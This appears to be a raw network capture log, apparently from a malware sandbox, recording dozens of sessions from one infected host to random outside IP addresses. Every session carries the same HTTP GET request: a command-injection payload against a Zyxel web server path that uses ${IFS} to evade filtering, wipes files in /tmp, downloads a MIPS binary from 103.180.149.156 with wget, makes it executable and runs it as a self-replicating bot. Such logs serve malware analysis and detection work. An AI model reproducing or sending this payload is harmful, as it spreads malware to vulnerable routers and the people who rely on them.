                                                      Feb 2, 2024 06:35:53.638938904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4650192.168.2.14447941.46.209.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638993979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4651192.168.2.143519294.3.142.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639017105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4652192.168.2.1448134132.10.236.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639033079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4653192.168.2.1445148133.112.89.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639103889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4654192.168.2.1444300125.219.38.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639166117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4655192.168.2.1442744122.177.80.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639179945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4656192.168.2.145369645.8.99.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639215946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4657192.168.2.14377484.87.82.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639273882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4658192.168.2.14555661.111.242.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639291048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4659192.168.2.1442000134.7.73.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639349937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4660192.168.2.1441622141.1.182.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.639378071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4661192.168.2.1437222113.132.39.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.654874086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4662192.168.2.1455282150.8.97.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.654933929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4663192.168.2.1435876207.209.27.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.654989958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4664192.168.2.144062214.123.39.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655014992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4665192.168.2.144374458.199.166.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655050993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4666192.168.2.144534863.189.6.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655100107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4667192.168.2.1454242189.0.182.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655134916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4668192.168.2.1459424126.241.220.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655168056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4669192.168.2.1436220163.148.109.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655215025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4670192.168.2.1458820219.92.223.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655276060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4671192.168.2.144126614.245.135.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655344963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4672192.168.2.1446966220.206.194.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655376911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4673192.168.2.1458370196.142.79.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655411005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4674192.168.2.1460760140.77.173.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655456066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4675192.168.2.145146050.14.88.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655514002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4676192.168.2.143586289.141.138.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655535936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4677192.168.2.144201283.140.110.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655570984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4678192.168.2.143507267.173.199.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655611992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4679192.168.2.1458068112.251.171.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655657053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4680192.168.2.1452208190.16.173.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655703068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4681192.168.2.1445676128.249.5.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655755997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4682192.168.2.143595678.207.95.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655783892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4683192.168.2.1454980129.242.103.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655839920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4684192.168.2.145672660.79.48.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655884981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4685192.168.2.1438146136.88.81.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655935049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4686192.168.2.1439712101.54.109.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.655983925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4687192.168.2.144486839.113.225.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656030893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4688192.168.2.1457522159.217.47.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656064034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4689192.168.2.1456780129.168.65.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656095028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4690192.168.2.1456552147.92.121.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656148911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4691192.168.2.144015235.165.20.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656208992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4692192.168.2.1434040180.50.196.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656254053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4693192.168.2.1457554182.180.183.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656286955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4694192.168.2.144241050.66.214.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656323910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4695192.168.2.14592568.163.209.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656357050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4696192.168.2.145949864.160.183.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656394958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4697192.168.2.143856232.97.247.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656433105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4698192.168.2.1453470135.85.14.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656490088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4699192.168.2.144808431.185.142.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656523943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4700192.168.2.1437840219.200.137.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656594038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4701192.168.2.1457106105.161.64.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656646967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4702192.168.2.1447440110.0.98.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656677008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4703192.168.2.144177438.167.232.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656712055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4704192.168.2.1460480159.36.54.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656759024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4705192.168.2.143572837.178.251.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656793118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4706192.168.2.1454718223.110.27.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656832933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4707192.168.2.1441500142.240.6.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656874895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4708192.168.2.1454922158.138.119.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656907082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4709192.168.2.144433868.15.247.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.656956911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4710192.168.2.143976271.182.177.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657000065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4711192.168.2.1446942202.132.64.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657048941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4712192.168.2.1436128103.203.231.75443
                                                      TimestampBytes transferredDirectionData
